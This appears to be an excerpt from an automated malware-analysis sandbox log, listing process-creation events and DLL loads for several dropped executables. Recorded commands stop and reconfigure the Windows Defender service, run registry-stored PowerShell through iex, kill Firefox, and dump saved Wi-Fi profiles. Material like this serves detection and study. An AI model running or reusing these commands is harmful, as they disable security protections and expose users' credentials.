Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
Source: C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
